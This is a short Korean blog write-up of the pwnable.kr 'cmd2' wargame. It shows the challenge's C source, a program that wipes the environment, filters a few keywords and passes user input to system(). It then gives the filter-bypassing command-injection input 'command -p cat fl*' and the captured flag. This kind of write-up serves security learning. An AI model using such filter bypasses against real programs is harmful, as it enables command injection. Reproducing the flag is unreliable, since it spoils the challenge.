Featured image of post pwnable.kr cmd2

pwnable.kr cmd2

주어진 링크에 접속하여 파일을 확인해보면 아래와 같은 파일이 주어진다. 이중에서 c파일을 열면 아래와 같은 내용을 확인 할 수 있다.

cmd2@pwnable:~$ ls
cmd2  cmd2.c  flag
cmd2@pwnable:~$ cat cmd2.c
#include <stdio.h>
#include <string.h>

int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "=")!=0;
        r += strstr(cmd, "PATH")!=0;
        r += strstr(cmd, "export")!=0;
        r += strstr(cmd, "/")!=0;
        r += strstr(cmd, "`")!=0;
        r += strstr(cmd, "flag")!=0;
        return r;
}

extern char** environ;
void delete_env(){
        char** p;
        for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
        delete_env();
        putenv("PATH=/no_command_execution_until_you_become_a_hacker");
        if(filter(argv[1])) return 0;
        printf("%s\n", argv[1]);
        system( argv[1] );
        return 0;
}

cmd1에서 사용했던 우회방식은 불가하다고 판단이 들었고, 아래와 같은 방식으로 우회하여 flag를 획득할 수 있었다.

cmd2@pwnable:~$ ./cmd2 "command -p cat fl*"
command -p cat fl*
FuN_w1th_5h3ll_v4riabl3s_haha
comments powered by Disqus